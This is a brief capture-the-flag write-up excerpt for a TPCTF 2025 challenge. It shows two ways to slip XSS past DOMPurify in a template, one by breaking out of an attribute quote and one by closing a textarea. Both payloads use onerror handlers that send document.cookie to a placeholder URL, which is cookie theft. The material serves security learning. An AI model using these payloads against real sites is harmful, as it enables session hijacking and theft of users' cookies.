One solution is to put `{{content}}` inside an attribute and to close the quote in the inner payload:

```html

```

```html
" onerror="fetch('{YOUR_URL}'+document.cookie)
```

An alternative solution is to close a `<textarea>`, like [Bad usage | Not enough context | Exploring the DOMPurify library: Hunting for Misconfigurations (2/2) | mizu.re](https://mizu.re/post/exploring-the-dompurify-library-hunting-for-misconfigurations#bad-usage-not-enough-context):

```html
<textarea>{{content}}</textarea>
```

```html
<div id="</textarea><img src=x onerror=fetch('{YOUR_URL}'+document.cookie)>"></div>
```

Original writeup (https://ouuan.moe/post/2025/03/tpctf-2025#baby-layout-81-solves).